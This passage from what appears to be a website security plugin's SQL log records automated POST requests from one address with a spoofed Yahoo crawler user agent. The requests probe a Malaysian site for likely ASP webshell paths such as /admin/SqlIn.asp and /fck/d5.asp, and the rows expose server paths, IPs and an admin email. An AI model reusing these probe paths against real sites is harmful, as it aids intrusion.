http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"61.240.98.55\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"61.240.98.55\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/Inc/confiig.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/Inc/confiig.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatdL4q@uz@DI827WH6v7QAAAUY\";s:12:\"REDIRECT_URL\";s:16:\"/Inc/confiig.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"64248\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/Inc/confiig.asp\";s:10:\"SCRIPT_URL\";s:16:\"/Inc/confiig.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatdL4q@uz@DI827WH6v7QAAAUY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571511599.8346\";s:12:\"REQUEST_TIME\";s:10:\"1571511599\";}}','notice','2019-10-19 19:00:01','2019-10-19 19:00:00',35267192,37066248,'http://bintara.com.my//Inc/confiig.asp',1,0,'61.240.98.55'),(28429,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/SqlIn.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"203.184.88.221\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"203.184.88.221\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/SqlIn.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/SqlIn.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatdSPVzlVwlNsD8qm@3OQAAAMM\";s:12:\"REDIRECT_URL\";s:16:\"/admin/SqlIn.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63341\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/SqlIn.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/SqlIn.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatdSPVzlVwlNsD8qm@3OQAAAMM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571511624.8744\";s:12:\"REQUEST_TIME\";s:10:\"1571511624\";}}','notice','2019-10-19 19:00:27','2019-10-19 19:00:25',35340568,37138896,'http://bintara.com.my//admin/SqlIn.asp',1,0,'203.184.88.221'),(28430,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/SqlIn.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"58.59.236.159\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"58.59.236.159\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/SqlIn.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/SqlIn.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatdWYq@uz@DI827WH6v9gAAAUM\";s:12:\"REDIRECT_URL\";s:16:\"/admin/SqlIn.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"64099\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/SqlIn.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/SqlIn.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatdWYq@uz@DI827WH6v9gAAAUM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571511641.7404\";s:12:\"REQUEST_TIME\";s:10:\"1571511641\";}}','notice','2019-10-19 19:00:43','2019-10-19 19:00:42',35267216,37059256,'http://bintara.com.my//admin/SqlIn.asp',1,0,'58.59.236.159'),(28431,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//admin/sql.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"124.40.121.135\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"124.40.121.135\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/admin/sql.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/admin/sql.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatdabVvTBqXFHRB7z8zzgAAAA0\";s:12:\"REDIRECT_URL\";s:14:\"/admin/sql.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62774\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/admin/sql.asp\";s:10:\"SCRIPT_URL\";s:14:\"/admin/sql.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatdabVvTBqXFHRB7z8zzgAAAA0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571511657.841\";s:12:\"REQUEST_TIME\";s:10:\"1571511657\";}}','notice','2019-10-19 19:00:59','2019-10-19 19:00:58',35339568,37140416,'http://bintara.com.my//admin/sql.asp',1,0,'124.40.121.135'),(28432,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//admin/sql.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"683\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"119.96.129.8\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"119.96.129.8\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/admin/sql.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/admin/sql.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xatdd7P2yel5jEccgdeUEwAAAZM\";s:12:\"REDIRECT_URL\";s:14:\"/admin/sql.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63237\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/admin/sql.asp\";s:10:\"SCRIPT_URL\";s:14:\"/admin/sql.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xatdd7P2yel5jEccgdeUEwAAAZM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571511671.2414\";s:12:\"REQUEST_TIME\";s:10:\"1571511671\";}}','notice','2019-10-19 19:01:12','2019-10-19 19:01:11',35267776,37072600,'http://bintara.com.my//admin/sql.asp',1,0,'119.96.129.8'),(28433,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"//fck/d5.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"821\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.206.142.12\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.206.142.12\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"http://bintara.com.my/fck/d5.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/fck/d5.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatdiPVzlVwlNsD8qm@3SAAAAMw\";s:12:\"REDIRECT_URL\";s:11:\"/fck/d5.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63916\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"http://bintara.com.my/fck/d5.asp\";s:10:\"SCRIPT_URL\";s:11:\"/fck/d5.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatdiPVzlVwlNsD8qm@3SAAAAMw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1571511689.02\";s:12:\"REQUEST_TIME\";s:10:\"1571511689\";}}','notice','2019-10-19 19:01:30','2019-10-19 19:01:29',35342224,37150160,'http://bintara.com.my//fck/d5.asp',1,0,'220.206.142.12'),(28434,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"//fck/d5.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"220.181.85.2\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"220.181.85.2\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"http://bintara.com.my/fck/d5.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/fck/d5.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatdoLP2yel5jEccgdeUKQAAAY4\";s:12:\"REDIRECT_URL\";s:11:\"/fck/d5.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62662\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"http://bintara.com.my/fck/d5.asp\";s:10:\"SCRIPT_URL\";s:11:\"/fck/d5.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatdoLP2yel5jEccgdeUKQAAAY4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571511712.132\";s:12:\"REQUEST_TIME\";s:10:\"1571511712\";}}','notice','2019-10-19 19:01:53','2019-10-19 19:01:52',35269456,37079352,'http://bintara.com.my//fck/d5.asp',1,0,'220.181.85.2'),(28435,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//contsssgaki.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"117.79.149.252\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"117.79.149.252\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/contsssgaki.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/contsssgaki.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xatd4rP2yel5jEccgdeUWQAAAYc\";s:12:\"REDIRECT_URL\";s:16:\"/contsssgaki.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62683\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/contsssgaki.asp\";s:10:\"SCRIPT_URL\";s:16:\"/contsssgaki.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xatd4rP2yel5jEccgdeUWQAAAYc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571511778.4907\";s:12:\"REQUEST_TIME\";s:10:\"1571511778\";}}','notice','2019-10-19 19:03:02','2019-10-19 19:02:58',35733112,37536328,'http://bintara.com.my//contsssgaki.asp',1,0,'117.79.149.252'),(28436,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//Enrol/500.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"211.69.156.161\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.69.156.161\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/Enrol/500.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/Enrol/500.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xatd8rVvTBqXFHRB7z8z2gAAAAE\";s:12:\"REDIRECT_URL\";s:14:\"/Enrol/500.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63356\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/Enrol/500.asp\";s:10:\"SCRIPT_URL\";s:14:\"/Enrol/500.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xatd8rVvTBqXFHRB7z8z2gAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571511794.8925\";s:12:\"REQUEST_TIME\";s:10:\"1571511794\";}}','notice','2019-10-19 19:03:16','2019-10-19 19:03:15',35339480,37126272,'http://bintara.com.my//Enrol/500.asp',1,0,'211.69.156.161'),(28437,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//Enrol/500.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"683\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; 